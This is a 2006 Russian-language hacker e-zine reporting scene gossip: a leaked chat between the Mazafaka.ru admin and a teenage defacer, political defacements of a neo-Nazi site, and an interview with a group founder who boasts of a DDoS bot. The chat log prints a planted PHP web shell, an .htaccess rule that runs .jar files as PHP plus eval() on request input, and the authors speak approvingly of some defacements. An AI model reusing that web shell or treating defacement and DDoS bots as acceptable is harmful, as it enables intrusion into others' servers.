. 2006-05-22 17:46
| . _ _ _ . _
| |\| ( ` | ` (_` |\| (_`
| | | ._) |_, (_, | | (_,
inscene e-zine issue 1
THE BEGINING...
СОДЕРЖАНИЕ:
0| Voices of inscene
1| Intro
2| Вышел defaced9
3| Вся правда о дефейсерах Mazafaka.ru и мазафакерском Сталкере
4| Политвзломы
5| Интервью с фаундером DKCS (http://dkcs.void.ru)
6| DarkEagle (unl0ck.net) больше не будет?
7| Outro
8| Contacts
_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,
0| Voices of inscene
-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`
Это пилотный ([black]: типа пиздатый %)) номер e-zine inscene. Задача этого
журнала - описать _реальное_ положение дел ([white]: или наше видение этого
положения) на ру сцене. Нам надоело читать неправду, видеть ежедневную подставу,
ложь, кидалово и тому подобное. Этот e-zine - крик нашей души, крик того слова
"правда", что уже давно утеряно и забыто многими людьми. Мы начинаем свою
работу. inscene в деле...
Вообще в зине будут публиковаться новости, интересные факты о группах, людях и
все что с ними связано. Всегда по какому-либо поводу мы будем высказывать свои
мысли и идеи; в будущем планируется выкладывать описание, обсуждение глобальных
проблем на ру сцене.
[black]: Стиль e-zine довольно необычен. Поскольку его делают два человека,
хорошо разбирающиеся в ru андерграунд сцене, имеющие различное мировоззрение и
различные взгляды на людей и команды, то было решено использовать эффект
противостояния между авторами. Авторы выбрали говорящие ники black и white для
освещения правды двух сторон темной и светлой соответственно.
[white]: Позволю себе сделать уточнение. Я не считаю, что я "хорошо" разбираюсь
в андеграунд сцене, как выразился мой коллега, но определенные аспекты мне
известны и их мы попытаемся обсудить.
Надеемся, что e-zine придется вам по душе, и вы оцените его по достоинству.
_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,
1| intro
-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`
[black] : Мда, что делается со сценой. Такой скукотищи не было никогда. Почти
никто не релизит ничего хорошего. Unl0ck что-то делал, но за последние полтора
месяца от них ничего хорошего нет, RST/GHC клепают разные тулзы со сплоитами,
cyberlords шпарят адвисори, hellknights и ru24 релизят всякую херню, которую,
наверное, уже каждый переписал по 100 раз, блядьхэты m00 утонули во тьме
привата. Опять наблюдается бурный рост количества кидис тим.
[white]: попробую прошить черный фон, сотканные коллегой, белыми нитками :)
Конечно, скучновато, это верно. Вспоминаются времена, когда известные и забытые
сейчас команды тусовались на общих каналах, обменивались опытом и делали
совместные, пусть где-то и смешные, проекты. Но есть-таки обнадеживающие лучики
в этом сумраке.
[black]: Как-раз я и хотел сказать, что тем не менее, еще встречаются интересные
случаи и любопытные ситуации. Появляются новости от команд и их мемберов.
[white]: да, но я имел в виду несколько иное. вот, смотри, несколько лет назад о
политических взломах у нас не говорили (если не считать глупых выходок типа
акции Hackers Against war, когда киддисы просто украшали свои дефейсы
антивоенными настроениями). А за последнее время: с одной стороны - нацисты
дефейсят сайты антифашистов и евреев, с другой стороны антифашисты несколько раз
ломали сайты самих неонацистов, кто-то объединяется для ддоса сайтов
"кавказцентра". Романтика! :)
Какие бы ни были цели, отвлечемся от этической стороны, целевые взломы - это
значительное событие среди дефейсеров. Но, обо всем в свое время.
Кроме того, радуют определенные направления среди указанных групп - писать
полезные утилиты, делать ПОК и эдвайсори на известные продукты - это тоже не
баловство. Что касается киддисов и кид-дефейсеров, я промолчу. Все когда-то
взрослеют, а если нет - то уходят в лету...
Ну что ж, начнем.
_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,
2| Вышел defaced9
-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`
[black] Вышел новый номер дефейседа.
В этот раз Евро был в мега депрессивном состоянии. И, видимо, поэтому он решил
выложить целую кучу никому ненужной херни в инклуд своего зина. Вспоминается
недовольная фраза евро в адрес кодпимпс о том, что они утяжеляют свой зин никому
ненужными анимешными чиксами, дык посмотри на себя Евро, твой дефейсед весит аж
~2.7Mb.
В последнем номере видны большие успехи в ascii art'е ;). И вообще с таким
составом в три человека, видимо, скоро к :
>> - умер зин Nightfall
>> - умер зин LmD
>> - умер зин Xaoc
>> - умер зин el8
>> - умер зин phrack
>> - умерли phc и их phrack
>> - умер зин h0no
>> - умер зин x25zine
>> - умер зин code pimps
>> - умер зин fds
>> - умер зин DarGon (Дурагон) в конце концов
прибавится еще один ;) Ну да ладно. В отличие от предыдущего зин получился
получше. Но к сожалению много философской воды + зачем-то логи вместо статей (в
прошлом номере были сплоиты =) нельзя было логи добавить в инклуды?)
[white] Дорогой коллега, позвольте снова вам прооппонировать :) Не могу понять,
чем это вам понравился этот номер больше, нежели предыдущий? Ведь здесь всего то
2 статьи, которые описывают техническую сторону хакинга! Остальное - тотальный
бред! А в чем я с вами соглашусь, так это в том, что к указанному списку
"прибавится еще один". Все на это указывает.
Как бы там ни было Скачать зин можно с :
http://web-hack.ru/e-zine/defaced/defaced9.zip
http://docs.sockets. ru/ezines/defaced9.zip
http://m00.void.ru/d9.zip
_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,
3| Вся правда о дефейсерах Mazafaka.ru и мазафакерском Сталкере
-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`
[black]: Все мы слышали, что 21 апреля этого года был дефейснут проект
Сталкера - Mazafaka.ru. Дефнули мазу рядовые кидисы Zadoxlik и ZaCo. Бага была в
скрипте с голосованием, а дефейсеры обычные детишки, которые сильно переживают
по поводу поступления в универ. В подтверждение этому, ниже представлен лог
Сталкера и незадачливого киддиса - задохлика. Неплохой лог, видимо он впервые
должен был появиться в следующем номере мазафакинского зина, но, как говориться,
кто не успел, тот опоздал :). Итак, читаем и узнаем много интересных вещей о
юных дефейсерах и Мазы в частности. Оказывается, Мазафака не такая уж и
непреступная, как нам когда-то в интервью рассказывал Сталк ;)
Главные действующие лица :
511501 - Zadoxlik он же кидис он же дефейсер мазы.
[с.т.а.л.к] - Сталкер :)
511501 (21:46:04 24/04/2006): привет
[с.т.а.л.к] (21:46:24 24/04/2006): ну привет
511501 (21:46:42 24/04/2006): ты Сталкер?
[с.т.а.л.к] (21:47:02 24/04/2006): я владелец и админ мазафакиРу
511501 (21:47:04 24/04/2006): админ мазафака.ру вообщем да?
511501 (21:47:06 24/04/2006): ясно
511501 (21:47:22 24/04/2006): мне сказал некто адвокат дьявола что на нас заявка
ментам ушла
511501 (21:48:17 24/04/2006): я не знаю чо сказать, мне это оченьн епонятно. и
так случилось что сейчас нам с ЗаКо это оченьн е кстати. Ты уж извини пожалйста
если мы ннанесли вам оскорбление нестерпимое. Можно это как-то уладить?
[с.т.а.л.к] (21:48:39 24/04/2006): да, я готовлю документы. логи уже ушли в
МТУ-Интел. они сказали что выдадут данные на вас по ип если будет заява
511501 (21:49:00 24/04/2006): данные обо мне ты можешь и так узнать по вхуизу
моего домена
511501 (21:49:03 24/04/2006): я не скрываюсь
511501 (21:49:08 24/04/2006): просто я не ожидал такой реакции
[с.т.а.л.к] (21:49:12 24/04/2006): он на бабу зареган
511501 (21:49:27 24/04/2006): извини вообщем. Если тебе извинения недостаточно -
скажи чо мне сделать
511501 (21:49:32 24/04/2006): да, но адрес там верный
[с.т.а.л.к] (21:50:32 24/04/2006): короче вы отняли у меня очень много времени.
нервов. и главное очень унизили проект взломом.. т.к. за пять лет нас никто и
никогда не дефейсил
511501 (21:50:50 24/04/2006): Ну чего. Понимаешь, мы в институт поступаем. Если
щас будет чото с менттами - труба полная. Чо сделать. Баги вы наверно и так по
логам знаете уже
[с.т.а.л.к] (21:51:19 24/04/2006): да. я пропатчил голосовалку
511501 (21:51:49 24/04/2006): Да госпади. в глазах кого. Дефейсили всех. И
дефейсят постоянно. Мы были неправы. Это точно. Но ментам. Вы же тоже
занимаетесь не покраской заборов
[с.т.а.л.к] (21:51:52 24/04/2006): вам похуй было на то что вы меня
задефейсите.. теперь пиздуйте в армию
511501 (21:52:29 24/04/2006): Блин. Мы были очень неправы. Чего сделать не знаю.
Могу съебать вообще сос воим ником
511501 (21:52:33 24/04/2006): Вот так даже
[с.т.а.л.к] (21:52:51 24/04/2006): да хоть винчестер форматируй
511501 (21:53:07 24/04/2006): Я был против дефейса категорически. Это не
умаливает вину Зако, но всеравно будь человеком. Мы мелкие и несмышленые
511501 (21:53:55 24/04/2006): Сталкер.
[с.т.а.л.к] (21:54:11 24/04/2006): нее.. на серваке насрали.. шел не убрали..
поставили еще один шел
[с.т.а.л.к] (21:54:22 24/04/2006): пытались продать багу на сервере
511501 (21:54:28 24/04/2006): кому?
511501 (21:54:31 24/04/2006): не пытались
511501 (21:54:34 24/04/2006): это вранье и подстава
511501 (21:54:38 24/04/2006): шелы даа не убрали
511501 (21:54:47 24/04/2006): и еще не один там. Все шелы щас скажу
511501 (21:54:53 24/04/2006): А продавать - никому и ничего
[с.т.а.л.к] (21:55:12 24/04/2006): за неделю до взлома ко мне пришла инфа что
багу на мазе продают
511501 (21:55:43 24/04/2006): Это гон чистой воды. Или екто-то другой обнаружил.
Короче за это тебе ручаюсь. Никто ничо не продавал. Да ты по логам посмотри
511501 (21:55:46 24/04/2006): чо там недделю назад было
[с.т.а.л.к] (21:56:34 24/04/2006): Короче то что ты говоришь сейчас и то что у
вас было на уме расходятся..
[с.т.а.л.к] (21:56:44 24/04/2006): дружественный взлом говоришь?
[с.т.а.л.к] (21:56:52 24/04/2006): изменили индекс и все?
511501 (21:57:27 24/04/2006): я тебе уже говорил, что я вообще был против
дефейса. Но это слишком дешего звучит, хотя это и так
[с.т.а.л.к] (21:57:48 24/04/2006): а это что?
stalk# cat .htaccess
AddType application/x-httpd-php .jar
stalk# cat anfybump3.jar
if(isset($_REQUEST['cmd']))
{
eval(stripslashes($_REQUEST['cmd']));
die();
}
?>
stalk#
511501 (21:57:48 24/04/2006): ЗАко говорит он даже сделал копию вашего старого
индекса
511501 (21:58:04 24/04/2006): я же сказал щас дам все шелы
511501 (21:58:44 24/04/2006): чел
[с.т.а.л.к] (21:58:51 24/04/2006): да шелы легко вычислить. незнание unix вам
сильно жизнь подпортило..
511501 (21:59:02 24/04/2006): Да
[с.т.а.л.к] (21:59:05 24/04/2006): touch надо уметь еще делать
511501 (21:59:08 24/04/2006): мы вообще раздолбаи
511501 (21:59:14 24/04/2006): уебки
511501 (21:59:16 24/04/2006): и плохие люди
511501 (21:59:19 24/04/2006): и тупые
[с.т.а.л.к] (21:59:25 24/04/2006): да хоть гуру.. мне реально на это похуй
511501 (21:59:29 24/04/2006): короче ты прав во всем а я неправ
[с.т.а.л.к] (21:59:57 24/04/2006): окей
511501 (22:00:07 24/04/2006): ну будь ты человеком. Чего ты хочешь? Всех
дефейсили. Это тока черный пеар больше
511501 (22:00:43 24/04/2006): Слушай. ты сам ни кого не дефейсил чтоли
[с.т.а.л.к] (22:01:11 24/04/2006): неее.. я другого хочу.. я хочу чтобы вам дали
условный срок. Посадят врядли.. у меня денег не хватит.. я потом напишу статью о
двух малолетках.. а мазу больше хакать не будут
[с.т.а.л.к] (22:01:25 24/04/2006): своих никогда.
[с.т.а.л.к] (22:01:56 24/04/2006): На протяжении 5 лет нас могли взломать
трижды.. и все разы люди связывались с нами и говорили о дырках
511501 (22:02:39 24/04/2006): Блииин. Чел. Прости. Мы чертовски трижды неправы.
Блин. Ну чо ты. Я не знаю. Это блин очень мне сильно жизнь испортит. Гораздо
сильнее чем тебе дефейс. Я правда был против него. Хотя тебе пофиг. Вообщем щас
подумаю. Мне наверно тебе нечего предложить, нету у меня ничего.
511501 (22:02:52 24/04/2006): не моя идея была
511501 (22:02:57 24/04/2006): ну блин
511501 (22:03:23 24/04/2006): =\
511501 (22:03:36 24/04/2006): Чего ты так набычился ? На что уж ты так много
времени убил
[с.т.а.л.к] (22:04:32 24/04/2006): на проверку того где могут лежать шелы
511501 (22:04:34 24/04/2006): Поставь себя на наше место. Это очень фиговое
положение. я действительно считаю что мы блин были неправы. Что я тебе это все
тыщу аз вповторяю. Лучше чо можно сделать. Не верю я что ты так оскорбился
вообещм
511501 (22:04:59 24/04/2006): сам небось в свое время дефейсил пачками
511501 (22:05:09 24/04/2006): Вообщем ты мне большой урок задал
511501 (22:05:11 24/04/2006): ненадо заяву
511501 (22:05:17 24/04/2006): плз(
[с.т.а.л.к] (22:05:45 24/04/2006): ну пускай мамаша раскошелится
511501 (22:06:13 24/04/2006): тебе меня слушать ненадоело ? я могу еще
рассказать как я долго и упорно готовился к поступлению, занимал первые, вторые
места на олимпиадах по физике. Но это скучно. Скажи, чего ты хочешь-то
511501 (22:07:09 24/04/2006): нету у нас денег. Мне чтобы тока интернет себе
сделать приходится самому всякой фигней заниматься типа угонам ыл или написания
статей
511501 (22:07:42 24/04/2006): неправильно все получается
[с.т.а.л.к] (22:07:51 24/04/2006):не парься. теперь писать не придется
511501 (22:07:57 24/04/2006): ладно ты меня напугал. я обоссался ажник от
перспективы аткой. Чего делать
511501 (22:08:19 24/04/2006): ты издеваешься? Ты не могу так обидеться на
дефейс.
511501 (22:08:50 24/04/2006): всех дефейсили. хакер.ру, античат, злой, нсд,
ру24, сстим. да всех вообщем. Чего
511501 (22:09:03 24/04/2006): Я учту что бывают такие реакции
511501 (22:09:08 24/04/2006): исправлюсь
511501 (22:09:52 24/04/2006): вообще у меня в жизни-то дефейсов было штуки 3-4.
я не такой уж и полоумный придурок который тока и занимает себя тем что ходит да
дефейсит всех потому что крутой.
[с.т.а.л.к] (22:09:54 24/04/2006): им просто было влом заморачиваться
а я чувак очень правильный.. сначала написал абуз в мту интел с логами.. они
посмотрели.. сказали что делать..
511501 (22:10:22 24/04/2006): И что они сказали? ну послушай. ТЗачем тебе надо
так сильно портить нам жизню
511501 (22:10:50 24/04/2006): Она что у нас очень легкая чтоли. Я думаю у тебя
куда полегче будет. Слушай, войди в оложения. Тысячу и одно извинение тебе от
меня
511501 (22:10:54 24/04/2006): адрес мой знаешь
511501 (22:11:05 24/04/2006): да и ЗаКо адрес тоже можешь узнать
511501 (22:11:08 24/04/2006): чо еще надо
511501 (22:11:11 24/04/2006): зачем ментам?
511501 (22:11:17 24/04/2006): разве это правильно
[с.т.а.л.к] (22:11:24 24/04/2006): короче.. репутация мазы подпорчена.. ее нужно
восстановить.
[с.т.а.л.к] (22:11:40 24/04/2006): у вас есть шанс это сделать.
511501 (22:11:51 24/04/2006): че я могу сделать
511501 (22:12:00 24/04/2006): написать что я мудила огородный
511501 (22:12:06 24/04/2006): и что я извиняюсь?
511501 (22:12:14 24/04/2006): этот лог краше всяких слов свое скает
511501 (22:12:53 24/04/2006): Пойми ты. Не по-человечески так поступить...
511501 (22:12:54 24/04/2006): =\
[с.т.а.л.к] (22:13:24 24/04/2006): 1. прислать свои фото (тех кто принимал
участие) - это блять отшибет у вас всякое желание заниматься хуйней..
рассекречены значит будете только учебой заниматься
2. грызть мозг кроку чтобы он убрал мазу из дефейсов на void.ru
511501 (22:13:35 24/04/2006): Чего такого. всех дефейсили. Ошибка маленькая в
скрипте (да он может и не ваш еще - точно напиши что н не ваш, и что ты не
виноват) со всеми бывает
511501 (22:14:12 24/04/2006): ну это пожалуйста. я харю свою, как я уже говорил,
ни от кого не скрываю
[с.т.а.л.к] (22:16:15 24/04/2006):пришлешь фоту свою с листком что ты
извиняешься в том что совершил.
Я, ФИО
Прошу прощения за то что нарушил функционирование сервера Mazafaka.Ru Больше так
делать не буду.
511501 (22:16:30 24/04/2006): .
511501 (22:16:31 24/04/2006): ок
511501 (22:16:37 24/04/2006): а откуда ты узнаешь я это или нет
511501 (22:16:43 24/04/2006): ну ладно я свою пришлю
511501 (22:16:45 24/04/2006): мне нежалко
[с.т.а.л.к] (22:17:09 24/04/2006): а кто согласится сфоткаться с такой
табличкой?
511501 (22:17:17 24/04/2006): фотошоп
511501 (22:17:40 24/04/2006): и у нас в классе многие согласятся
[с.т.а.л.к] (22:17:46 24/04/2006): заебал ты.. все пока
511501 (22:17:58 24/04/2006): чего. я же говорю что согласен
[с.т.а.л.к] (22:18:46 24/04/2006):
http://taxidermia.void.ru/mirrors/2006/04/21/www1.mazafaka.ru/
чтобы этого небыло
[black]: Жалкое зрелище...
Мдааа, Сталк, неужели ты считаешь, что действительно, восстановишь
справедливость, если напишешь на кидисов заяву и получишь чужие фотки от них =)?
Нужно было следить за своим проектом, а после драки кулаками не машут ;).
Кстати, Сталкер у нас старательный мальчик и в надежде на то, что о взломе
забудут, он писал письма, стучал в icq владельцам сайтов с миррорами дефейсов с
просьбой о том, чтобы удалили все зеркала дефа мазы (вообщем подлизывал задницы
всем, жертвуя своей репутацией для ВЕЛИКОЙ МАЗЫ %))).
[white]: ну, я опять-таки не соглашусь. Во-перых, мазафака.ру не такой уж
"великий сайт", во-вторых, не скажу, что в моих глазах репутация ресурса
страдает от того, что его дефейсят. Даже не стану утруждать себя примерами
действительно серьезных сайтов, которые подвергались дефейсам. В свое время даже
был организован музей самых известных взломом.
[black]: Ладно, не мое дело, пожелаем все вместе, чтобы восторжествовала
справедливость и упавшая репутация ВЕЛИКОГО ресурса Мазафака.ру была полностью
восстановлена =))).
,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,
4|Политвзломы
-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`
[white]: Хоть кто-то ломает не от дури в голове, и это не может не радовать.
ANTIFA HACK TEAM (http://ns-88-org.narod.ru, http://antifa.ru) на 9 мая провела
успешную атаку на нацистский сайт http://www.slavnazi.com/
Скрин дефейса найден здесь:
http://ru.indymedia.org/usermedia/image/9/large/slavnazi.png
Через пару дней дефейс повторился.
http://ru.indymedia.org/usermedia/image/11/large/screen.png
Текст, который оставили хакеры на главной странице нацистского портала, содержал
следующее:
"Господа!
Прежде чем сообщать всем на сервере "правду" о Вселенских Заговорах позаботьтесь
о своей собственной грамотности
Четыре взлома за два дня - не многовато ли это?
С днем Победы!"
Идеологические и этические коментарии оставим при себе, но сама постановка
вопроса не может не радовать тех, кто в теме :)
[black]: Я просто вынужден заметить кое-что про этих киддисов, которые толком
ничего не способны сделать кроме дефа. Я не нацист, и я против фашизма, но я не
собираюсь становиться фанатиком имхо ламерской тимы, которая хакает через
браузер и возможно, имеет один купленный зеродэй приватный сплоит. Ну и что с
этих дефейсов? Неужели деф - это борьба с фашизмом? С этим боролись не так. А
вообще про Антифу ходит слава лузеров и скинов, хотя и со светлыми целями.
,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,
5|Интервью с фаундером DKCS (http://dkcs.void.ru)
-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`
[black]: вот ты говоришь, что не все так плохо на сцене, давай поговорим с
другими.
[white]: давай! предлагаю на угад взять интервью у какой-нибудь из новых групп.
[black]: google?
[white]: давай. по какому принципу?
[black]: пусть это будет хоть киддисы, но чтоб не очень ламеристые. давай
прошвырнемся по сайтам на войде?!
[white]: согласен.
http://www.google.com/search?q=hack+inurl%3Avoid.ru&sourceid=mozilla-search&
start=0&start=0&ie=utf-8&oe=utf-8
Так, ну hack-expo мы трогать не будем =) Вот, следующая по списку DKCS. Вперед?
Действующие лица:
Dr_Pixel - фаундер DKCS
B&W - black and white
>> - после этого комменты.
B&W: расскажи, когда была создана команда, с какой целью? чем занимаетесь?
Dr_Pixel: команда была создана 3 года назад из ранее распавшейся команды - The
Pretorians, в которой до этого состоял Я. Команда была создана с целью
исследования проблем информационной безопасности и просто для обмена опытом.
B&W: есть какие-то результаты исследований?
Dr_Pixel: Да, есть. Были найдены уязвимости во многих системах, которые до сих
пор не пропатченны. И информация об этих багах до сих пор приватна. Писали
программы.
>>black>> 0day w4r3z by DKCS %). Oooh yeah baby!... %))
B&W: как вы оцениваете ситуацию на сцене в настоящее время?
Dr_Pixel: Вообще многие сейчас сомневаются в существовании сцены... И Я в том
числе...
B&W: ну, тогда следует уточнить, что вы понимаете под сценой
Dr_Pixel: под сценой я понимаю сообщество людей из разных направлений
"андерграунда", объединенных для усиления и развития этой самой сцены..
B&W: ну, хорошо, давай иначе. есть ли команды, группы, которые вы могли бы
отметить? может быть те, на которых можно ровняться?
Dr_Pixel: да, следует отметить r57/ghc/Hell Knights. Это не полный список...
Просто трудно сразу вспомнить всех, пусть их и не много. Еще мне оч нравятся
успехи HATS Security Team
B&W: а как ты оцениваешь свой уровень и уровень тимы?
Dr_Pixel: свой уровень мне трудно оценить... думаю выше среднего... а вообщем
тима довольно профессиональна, сейчас занимаемся в основном частными
разработками (пишем провитный софт), и у нас довольно-таки не плохие успехи...
никто не жалуется =))
>>black>> неплохо получается писать кидисных ботов, которых никто никогда не
увидит и не пожалуется =)
>>white>> блек, ты злодей :)
Dr_Pixel: лично я занимаюсь в последнее время в плотную кодингом.. с++/asm +
api..
B&W: дефейсами не увлекались? :)
Dr_Pixel: хех... дефейсы... это было 2-3 года назад... Щяс скучно... делал пару
раз недавно для потехи в свободное время =)))
>>black>> было 2-3 года назад, но при этом недавно :\, браузерные кулхацкеры =)
>>white>> 2-3 года назад - это наверняка были "проф-кид-взломы" с дефейсами ;) А
сейчас - от нечего делать - успокоить нервы.
B&W: а есть какие-нибудь релизы, или приватные баги, etc. Которыми бы гордилась
тима?
Dr_Pixel: хм.. из своих достижений я больше всего горжусь dkcs.worm.ddos
ботом...
>>black>> мдаа, куда катится сцена, если гордость тимы - это DDoS бот...
>>white>> все, что связано с ддос, становится популярным из-за востребованности
на рынке черных услуг.
B&W: какие у вас отношения с другими командами? может были совместные акции?
или наоборот - война?
Dr_Pixel: с другими командами войн нет... общяюсь со всеми понемногу... знаю
многих.. вот тут про бота - http://dkcs.qwhost.net/index.php?showtopic=639
B&W: ты упоминал про приватные разработки. как определяете, что пускать на люди,
а что оставлять в привате?
Dr_Pixel: изначально писал на заказ, потом заказчик не смог выплатить все, и мне
пришлось его продавать для оплаты своего тяжелого труда =)))))))) Из приватных
разработак... Если чего-то нехватает в фри, то мы это выкладываем, выкладываем
даже open source, так мы сделали с DKCS ICQbot'ом.. просто нигде нет
опенсорсового ICQbot'а под винду... решили сделать свое.. и отдали людям.
>>black>> мне всю жизнь не хватало icq бота под win32 от DKCS %))) Теперь я буду
спать спокойно :)
>>white>> вот досмеешься - подсадят тебе троян и будешь сам дос-ботом :)
B&W: как вы относитесь к блэкхэтам? То есть с блэкхэт тимами? И какими
конкретно?
Dr_Pixel: блекхаты.. хех... я иногда с ними работаю =))) Вообще нормально...
каждый работает как может. А блекхат тим не знаю... отдельные люди... их ники
упоминать не будем.
B&W: Как на счет планов? Чем планируете поделиться с миром?
Dr_Pixel: хех... думаю в конце лета будет ddos бот от нашей тимы,
распростронятся будет open source. Хотя может и раньше.. + щяс занимаюсь
исследованием VoIP & h.323, думаю что-нить там найдем..
>>black>> у меня складывается впечатления, что это единстевенная мега 1337
разработка by DKCS %)
B&W: :) на последок хотелось бы спросить, ккие прогнозы насчет сцены? как
думаешь, будут ли изменения? или все так и затухнет?
Dr_Pixel: я думаю сцены как прежде уже не будет, но стоит надеятся, что наши
последователи возродят былую мощь ru-scene
>>black>> ваши последователи %) Это те, которые перепишут DDoS бот более
грамотно? %)
B&W: будем надеяться на лучшее! спасибо за диалог!
>>white>> нда, блек, 1:0 в твою пользу. в следующий раз пригласим для интервью
кого-то другого :)
_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,
6| DarkEagle (unl0ck.net) больше не будет?
-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`
[black]: Сразу оговорюсь, что это пока только слухи, но по некоторым данным
стало известно, что мембер и фаундер unl0ck(он же UKT, он же 55k7) ушел со
сцены. Связано это с тем, что он увлекся реалом и перестал видеть смысл в
хэкерстве. Возможно это просто затянувшаяся пауза в работе, но многие готовы это
опровергнуть.
Итак, будем ждать офицального заявления.
_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,
7| Outro
-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`
[black]: Вот и подошел к концу наш первый выпуск журнала inscene. Будем верить
в то, что он принесет пользу, что люди откроют глаза на тех, кто находится на
сцене. А вообще, судить о сцене нужно не нам, а вам, наша задача излогать факты
и высказывать собственное мнение.
Я благодарен, тем людям, которые помогли нам с первым выпуском, спасибо. Ну и
конечно, спасибо тем, кто все-таки решил прочитать наш журнал. Последующие
выпуски мы постараемся сделать более захватывающими и содержательными, так что
не забывайте нас ;)
[white]: а я со своей стороны хочу пожелать больше оптимизма и поблагодарить
тех, кто согласился на интервью для этого и будущих номеров ;)
_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,
8| Contacts
-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`-`
С нами можно связаться по e-mail:
[email protected]
Будем рады вашим отзывам, замечаниям и предложениям.
И еще, по поводу размещения журнала на ваших сайтах. Мы только за. Пожалуйста,
создавайте мирроры, поддерживайте единственный e-zine о правде на ру сцене :).
Только, просьба сообщить о мирроре на наш e-mail для публикации оффициальных
зеркал в следующем номере. Всем спасибо ;)
с вами были black & white